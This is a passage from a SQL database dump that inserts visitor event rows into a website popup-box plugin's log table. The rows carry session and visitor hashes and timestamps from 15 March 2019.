(69965, 'bf680e6e756627801d1732fd394db364', '22f43a16a511f701', 0, 2, 1, '2019-03-15 15:24:59'),
(69966, 'bf680e6e756627801d1732fd394db364', '22f43a16a511f701', 0, 2, 1, '2019-03-15 15:25:37'),
(69967, 'f1a0663c1f43c5cf10c8ace4791b2d2f', '3e2639227e08f6ff', 0, 2, 1, '2019-03-15 15:28:07'),
(69968, 'f1a0663c1f43c5cf10c8ace4791b2d2f', '3e2639227e08f6ff', 0, 2, 1, '2019-03-15 15:32:32'),
(69969, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 15:40:19'),
(69970, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 15:40:33'),
(69971, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 15:40:45'),
(69972, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 15:40:54'),
(69973, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 15:42:37'),
(69974, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 15:43:59'),
(69975, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 15:46:04'),
(69976, '0b5bdba0b15045ffe3b34c9f967494f9', 'f8f70c95a9dd1c3e', 0, 2, 1, '2019-03-15 15:47:07'),
(69977, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 15:49:26'),
(69978, '6e506cad00a2a62f8f4bbc560300e2d7', '22905843105c275f', 0, 2, 1, '2019-03-15 15:54:10'),
(69979, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 15:55:24'),
(69980, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 15:56:32'),
(69981, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-15 15:56:55'),
(69982, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 15:57:00'),
(69983, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-15 15:57:50'),
(69984, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 15:57:51'),
(69985, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 15:58:03'),
(69986, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 15:58:15'),
(69987, '6e506cad00a2a62f8f4bbc560300e2d7', '22905843105c275f', 0, 2, 1, '2019-03-15 15:59:36'),
(69988, 'c084ce3b8b98c79bff95e878a96bf7f5', 'ffb222534e5ef54a', 0, 2, 1, '2019-03-15 16:00:11'),
(69989, 'e4807ce17096e7ddf75d87b732b3bf15', '935b3c7088d60538', 0, 2, 1, '2019-03-15 16:01:05'),
(69990, 'e2f16a0000b2ece010a0810c143c251d', 'df27b9a2919a8206', 0, 2, 1, '2019-03-15 16:01:51'),
(69991, 'fc1d51e55019ce4fccfb8173c0ddc680', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 16:01:55'),
(69992, '8c7569faa37b282bd4f185d3cc32c711', '20683e7ff6f02d30', 0, 2, 1, '2019-03-15 16:02:05'),
(69993, 'c7a4ccc3234e8d2e4934f8b908a4a785', '5f9d69d805ee629f', 0, 2, 1, '2019-03-15 16:02:06'),
(69994, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 16:02:36'),
(69995, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 16:02:50'),
(69996, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 16:02:53'),
(69997, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:03:41'),
(69998, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 16:03:43'),
(69999, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:03:59'),
(70000, '781d66807e707a7e637602aa4051c0e6', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-15 16:05:57'),
(70001, '781d66807e707a7e637602aa4051c0e6', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-15 16:06:34'),
(70002, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 16:06:49'),
(70003, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 16:07:08'),
(70004, '91c93b149902513645cefead6c1deaa3', 'df2f194cea195593', 0, 2, 1, '2019-03-15 16:07:34'),
(70005, 'b7744d4beff06619fea4b566a3342b85', '8e9a16956483f85e', 0, 2, 1, '2019-03-15 16:08:07'),
(70006, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 16:09:05'),
(70007, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-15 16:10:24'),
(70008, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 16:10:36'),
(70009, 'b7744d4beff06619fea4b566a3342b85', '8e9a16956483f85e', 0, 2, 1, '2019-03-15 16:11:02'),
(70010, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 16:11:10'),
(70011, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-15 16:11:16'),
(70012, 'bf680e6e756627801d1732fd394db364', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:11:21'),
(70013, '781d66807e707a7e637602aa4051c0e6', 'c2f4fbfba81c4858', 0, 2, 1, '2019-03-15 16:12:52'),
(70014, 'bf680e6e756627801d1732fd394db364', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:13:52'),
(70015, '8c7569faa37b282bd4f185d3cc32c711', '20683e7ff6f02d30', 0, 2, 1, '2019-03-15 16:14:01'),
(70016, 'b7744d4beff06619fea4b566a3342b85', '8e9a16956483f85e', 0, 2, 1, '2019-03-15 16:15:18'),
(70017, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 16:16:33'),
(70018, '70f036b35e3fd94af25c2e21f1cca89a', 'fca74db46227ed45', 0, 2, 1, '2019-03-15 16:18:02'),
(70019, '6c19fa5576bc6c34a5c8522ac258b147', '44451e386b316e7c', 0, 2, 1, '2019-03-15 16:18:12'),
(70020, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-15 16:19:16'),
(70021, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 16:19:40'),
(70022, 'b7744d4beff06619fea4b566a3342b85', '8e9a16956483f85e', 0, 2, 1, '2019-03-15 16:20:34'),
(70023, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 16:20:39'),
(70024, 'f1eedaac6548b2dafb514b75008a1bd4', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-15 16:21:12'),
(70025, '69f2848632c00b1ebb3f8115776322fe', '3be5c6f15c85d19b', 0, 2, 1, '2019-03-15 16:21:28'),
(70026, '43f3c7ccf9c39b49cd102690e0f32b42', 'fc09d83cc3320da4', 0, 2, 1, '2019-03-15 16:21:32'),
(70027, '91c93b149902513645cefead6c1deaa3', 'df2f194cea195593', 0, 2, 1, '2019-03-15 16:21:35'),
(70028, 'bf680e6e756627801d1732fd394db364', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:22:07'),
(70029, 'bf680e6e756627801d1732fd394db364', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:22:16'),
(70030, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-15 16:22:44'),
(70031, '1342f272be51f4194bc63bda4b2a5df4', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 16:22:44'),
(70032, '08e826cc5f475b46e0f83d97f374b291', '8cb82e91ebbe3cf7', 0, 2, 1, '2019-03-15 16:23:14'),
(70033, '70f036b35e3fd94af25c2e21f1cca89a', 'fca74db46227ed45', 0, 2, 1, '2019-03-15 16:23:19'),
(70034, 'b7f671fb0c09d51d565ade536f8e58b6', 'd86d441339858efd', 0, 2, 1, '2019-03-15 16:23:36'),
(70035, '1342f272be51f4194bc63bda4b2a5df4', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 16:24:10'),
(70036, 'e2f16a0000b2ece010a0810c143c251d', 'df27b9a2919a8206', 0, 2, 1, '2019-03-15 16:24:46'),
(70037, '7fc89d5b3ba7633dfcdcb5f003ea1851', '9a544a29f95c3d91', 0, 2, 1, '2019-03-15 16:25:02'),
(70038, '7fc89d5b3ba7633dfcdcb5f003ea1851', '9a544a29f95c3d91', 0, 2, 1, '2019-03-15 16:25:12'),
(70039, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 16:25:18'),
(70040, '3c52cc1a55c674c9c8c659b7affc27d5', '5b3051f95f43261f', 0, 2, 1, '2019-03-15 16:25:21'),
(70041, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:26:29'),
(70042, '6471018b8d155bea6e83954d9d531240', 'edfe950d47379572', 0, 2, 1, '2019-03-15 16:26:29'),
(70043, '6471018b8d155bea6e83954d9d531240', 'edfe950d47379572', 0, 2, 1, '2019-03-15 16:26:36'),
(70044, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-15 16:26:37'),
(70045, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 16:27:27'),
(70046, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 16:27:44'),
(70047, '3ae3992f47f764e690898d3298186c0f', '175b72b9380c40ec', 0, 2, 1, '2019-03-15 16:29:28'),
(70048, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-15 16:29:32'),
(70049, 'd1f493350254262d7567dc959fb0f592', '2fb35e3ca4da072a', 0, 2, 1, '2019-03-15 16:29:48'),
(70050, '20b9f8cf33790d8a583ca5669fb80466', '74e4cd40040f72b5', 0, 2, 1, '2019-03-15 16:29:53'),
(70051, '20b9f8cf33790d8a583ca5669fb80466', '74e4cd40040f72b5', 0, 2, 1, '2019-03-15 16:30:10'),
(70052, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-15 16:32:14');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(70053, 'd9cd2c98365fd1831aa2121fded958f2', '9da59c434e721e9b', 0, 2, 1, '2019-03-15 16:32:16'),
(70054, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-15 16:33:51'),
(70055, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 16:34:20'),
(70056, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 16:34:52'),
(70057, '7dff36255315f3f29dc8ecb0df4026d3', '7ffba4677245886f', 0, 2, 1, '2019-03-15 16:35:32'),
(70058, '7dff36255315f3f29dc8ecb0df4026d3', '7ffba4677245886f', 0, 2, 1, '2019-03-15 16:35:47'),
(70059, '29fd46dfcf5f22097bb775e962b40b77', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:38:01'),
(70060, '29fd46dfcf5f22097bb775e962b40b77', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:38:25'),
(70061, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:38:33'),
(70062, 'd35cf219cac2d44d1caae3b828351e0c', '5337572bd1c5218a', 0, 2, 1, '2019-03-15 16:38:39'),
(70063, '0cafeabb93ae1a96769d52ef8845c437', '50d02461c9e1908b', 0, 2, 1, '2019-03-15 16:39:24'),
(70064, '29fd46dfcf5f22097bb775e962b40b77', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:41:15'),
(70065, '422c4f962eb3938a1f6fff1149d10038', 'e67416ef443a1169', 0, 2, 1, '2019-03-15 16:42:21'),
(70066, '87228c271bdb220876fac75b58653bb8', 'd38cc91fa3f0e98a', 0, 2, 1, '2019-03-15 16:42:27'),
(70067, '87228c271bdb220876fac75b58653bb8', 'd38cc91fa3f0e98a', 0, 2, 1, '2019-03-15 16:43:20'),
(70068, 'a289d557d348c58307dcf6c9d155fd05', '44451e386b316e7c', 0, 2, 1, '2019-03-15 16:46:17'),
(70069, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:48:27'),
(70070, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:49:37'),
(70071, 'fb4b9e366bfa7805e9514c82a6523b62', 'b43949f3d3a73617', 0, 2, 1, '2019-03-15 16:49:53'),
(70072, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:50:26'),
(70073, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:54:22'),
(70074, 'ee33dd0650c0dfe517ea2701d9ce5b40', '5e50e507a2a74f61', 0, 2, 1, '2019-03-15 16:54:27'),
(70075, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 16:54:39'),
(70076, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 16:54:54'),
(70077, '29fd46dfcf5f22097bb775e962b40b77', '22f43a16a511f701', 0, 2, 1, '2019-03-15 16:55:06'),
(70078, '84989518422d2d2e528550dada6a772e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-15 16:55:59'),
(70079, 'f012d570ff5d73d8f2e8c87a95699b86', '525abb4dc04ca54a', 0, 2, 1, '2019-03-15 16:56:36'),
(70080, 'b7744d4beff06619fea4b566a3342b85', '8e9a16956483f85e', 0, 2, 1, '2019-03-15 16:56:47'),
(70081, 'b1097194e12e435150c6a6834a382db3', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-15 16:56:57'),
(70082, 'b7f671fb0c09d51d565ade536f8e58b6', 'd86d441339858efd', 0, 2, 1, '2019-03-15 16:57:25'),
(70083, 'd3da0c28c55c0b10271f6c559d7a3b85', '2c7b1154d9fcbd15', 0, 2, 1, '2019-03-15 16:57:53'),
(70084, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 16:58:09'),
(70085, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 16:59:30'),
(70086, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 16:59:35'),
(70087, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 16:59:47'),
(70088, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:00:07'),
(70089, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:00:16'),
(70090, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:01:02'),
(70091, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:01:22'),
(70092, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:02:02'),
(70093, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 17:02:16'),
(70094, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 17:02:31'),
(70095, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:02:42'),
(70096, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:02:47'),
(70097, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:02:54'),
(70098, 'e2f16a0000b2ece010a0810c143c251d', 'df27b9a2919a8206', 0, 2, 1, '2019-03-15 17:03:02'),
(70099, 'cc4c0bf3b70254b22daa89dfe9fe1fa7', '33bb13250826d76c', 0, 2, 1, '2019-03-15 17:03:21'),
(70100, '1342f272be51f4194bc63bda4b2a5df4', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 17:03:24'),
(70101, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:03:26'),
(70102, '5dfab69f27cb3725010b54f8162956c9', '407198c79af506a8', 0, 2, 1, '2019-03-15 17:03:27'),
(70103, 'fb595486f3d2ca20059cfc20784ad625', 'ec0043710d8c5405', 0, 2, 1, '2019-03-15 17:03:30'),
(70104, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:03:32'),
(70105, 'd3da0c28c55c0b10271f6c559d7a3b85', '2c7b1154d9fcbd15', 0, 2, 1, '2019-03-15 17:03:37'),
(70106, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:03:47'),
(70107, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:03:51'),
(70108, '5dfab69f27cb3725010b54f8162956c9', '407198c79af506a8', 0, 2, 1, '2019-03-15 17:04:01'),
(70109, 'a381eec39e807e5d9a925a3dede5e29f', '83ae70e18fcbc633', 0, 2, 1, '2019-03-15 17:04:05'),
(70110, 'b7f671fb0c09d51d565ade536f8e58b6', 'd86d441339858efd', 0, 2, 1, '2019-03-15 17:04:10'),
(70111, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:04:27'),
(70112, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:04:41'),
(70113, 'fb595486f3d2ca20059cfc20784ad625', 'ec0043710d8c5405', 0, 2, 1, '2019-03-15 17:04:42'),
(70114, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:04:45'),
(70115, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:04:45'),
(70116, '1ef29c5a76aef8241521f60cb071380b', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-15 17:04:57'),
(70117, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:04:58'),
(70118, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:05:00'),
(70119, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:05:03'),
(70120, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:05:10'),
(70121, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:05:12'),
(70122, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:05:16'),
(70123, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:05:27'),
(70124, '71d7161fd8d596cb39b31a814cd5fe59', 'b57104b37a2d8fd8', 0, 2, 1, '2019-03-15 17:05:37'),
(70125, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:05:39'),
(70126, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:05:45'),
(70127, '1342f272be51f4194bc63bda4b2a5df4', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 17:05:45'),
(70128, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:05:48'),
(70129, '71d7161fd8d596cb39b31a814cd5fe59', 'b57104b37a2d8fd8', 0, 2, 1, '2019-03-15 17:05:49'),
(70130, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:06:09'),
(70131, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:06:17'),
(70132, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:06:20'),
(70133, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:06:22'),
(70134, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:06:26'),
(70135, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:06:28'),
(70136, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:06:37'),
(70137, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:06:39'),
(70138, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:06:47'),
(70139, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:06:47'),
(70140, '71d7161fd8d596cb39b31a814cd5fe59', 'b57104b37a2d8fd8', 0, 2, 1, '2019-03-15 17:06:47'),
(70141, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:07:20'),
(70142, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:07:37'),
(70143, '1342f272be51f4194bc63bda4b2a5df4', '8fc54d0fa1b53ac8', 0, 2, 1, '2019-03-15 17:07:56'),
(70144, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:08:37'),
(70145, '7d33030df7938809523da1302ac15140', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-15 17:08:55'),
(70146, '8ae2b73ea5511ba7f650e5ae0d607ca0', '17c4c10bd238d11b', 0, 2, 1, '2019-03-15 17:09:18'),
(70147, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:09:26'),
(70148, 'b7f671fb0c09d51d565ade536f8e58b6', 'd86d441339858efd', 0, 2, 1, '2019-03-15 17:09:34'),
(70149, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:09:40'),
(70150, 'fa38d734b26f874689b1f008b06b4137', '3d1dceaf0c765f9c', 0, 2, 1, '2019-03-15 17:09:44'),
(70151, 'adc302d509e79924c9555c65b53874ce', '7501b42c35accff7', 0, 2, 1, '2019-03-15 17:10:06'),
(70152, 'a60669b013414a87d900ed1f549ca0dc', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-15 17:10:07'),
(70153, '1ef29c5a76aef8241521f60cb071380b', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-15 17:10:08'),
(70154, '3f62a2611fa486ed5c4b8cef7a3f6dcb', 'da46920ac3d89842', 0, 2, 1, '2019-03-15 17:10:14'),
(70155, 'a60669b013414a87d900ed1f549ca0dc', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-15 17:10:22'),
(70156, '632a22f6819943493845258835e75a6d', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-15 17:10:41'),
(70157, 'cb07bdcd2b1ab66622278453ac2a21f2', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-15 17:11:39'),
(70158, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:12:42'),
(70159, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:13:01'),
(70160, '6a83a02b2d89614edbee90b5aaf33abd', '61c6e54b747dd5a0', 0, 2, 1, '2019-03-15 17:15:09'),
(70161, 'dda1d15fc8b8a2468c1c6404008cd8cf', 'f69214bd1249660d', 0, 2, 1, '2019-03-15 17:15:18'),
(70162, '07e7754846ca1abd8b1bb3dd688d72ad', '447f0e0c6592a0c2', 0, 2, 1, '2019-03-15 17:20:30'),
(70163, '7846756c8b00b0b552c15ca6e92a8c66', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-15 17:21:50'),
(70164, '7846756c8b00b0b552c15ca6e92a8c66', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-15 17:22:04'),
(70165, 'adc302d509e79924c9555c65b53874ce', '7501b42c35accff7', 0, 2, 1, '2019-03-15 17:22:13'),
(70166, '7734be21dedff30cdfdeeb85d24d7164', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-15 17:23:57'),
(70167, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:23:59'),
(70168, 'a289d557d348c58307dcf6c9d155fd05', '44451e386b316e7c', 0, 2, 1, '2019-03-15 17:24:04'),
(70169, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:25:19'),
(70170, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 17:25:24'),
(70171, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:25:44'),
(70172, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:26:03'),
(70173, 'b3fb113711ce1f9de02b1142370a3c8f', '1e5678db042fb569', 0, 2, 1, '2019-03-15 17:26:57'),
(70174, '07f305421f5f44bd73855aa19b38907b', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 17:27:51'),
(70175, 'b95b9820ce3952222f2940caea1d7c3a', '624d6937076d1188', 0, 2, 1, '2019-03-15 17:28:50'),
(70176, '07f305421f5f44bd73855aa19b38907b', 'f57df3b284792c57', 0, 2, 1, '2019-03-15 17:28:52'),
(70177, 'b95b9820ce3952222f2940caea1d7c3a', '624d6937076d1188', 0, 2, 1, '2019-03-15 17:29:02'),
(70178, 'b95b9820ce3952222f2940caea1d7c3a', '624d6937076d1188', 0, 2, 1, '2019-03-15 17:29:32'),
(70179, '38a6d3bed3e3232b8028dab46dc4b269', '7ffba4677245886f', 0, 2, 1, '2019-03-15 17:29:32'),
(70180, '1159726124ac79a192efa55d945f81f7', 'da0989130d1f218b', 0, 2, 1, '2019-03-15 17:29:33'),
(70181, '29fd46dfcf5f22097bb775e962b40b77', '22f43a16a511f701', 0, 2, 1, '2019-03-15 17:30:46'),
(70182, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-15 17:30:49'),
(70183, 'fb595486f3d2ca20059cfc20784ad625', 'ec0043710d8c5405', 0, 2, 1, '2019-03-15 17:32:02'),
(70184, '1159726124ac79a192efa55d945f81f7', 'da0989130d1f218b', 0, 2, 1, '2019-03-15 17:32:11'),
(70185, 'b95b9820ce3952222f2940caea1d7c3a', '624d6937076d1188', 0, 2, 1, '2019-03-15 17:32:20'),
(70186, '1159726124ac79a192efa55d945f81f7', 'da0989130d1f218b', 0, 2, 1, '2019-03-15 17:32:38'),
(70187, 'f4247fa3f5f1428aef7ce1f8032b8181', '320bf2e21f88f143', 0, 2, 1, '2019-03-15 17:33:11'),
(70188, 'a60669b013414a87d900ed1f549ca0dc', '0f23dbab8b65eec0', 0, 2, 1, '2019-03-15 17:33:41'),
(70189, '9c4273364168e886e308346ea6212949', '85c87c6892dfb12d', 0, 2, 1, '2019-03-15 17:34:02'),
(70190, '389010a900bad45c891548be453b57a0', 'c423a976f7958be7', 0, 2, 1, '2019-03-15 17:37:26'),
(70191, 'b7f671fb0c09d51d565ade536f8e58b6', 'd86d441339858efd', 0, 2, 1, '2019-03-15 17:38:35'),
(70192, 'a8cb5bbd7d84a14f0e25f477bb69b89a', '7ffba4677245886f', 0, 2, 1, '2019-03-15 17:39:01'),
(70193, '389010a900bad45c891548be453b57a0', 'c423a976f7958be7', 0, 2, 1, '2019-03-15 17:39:06'),
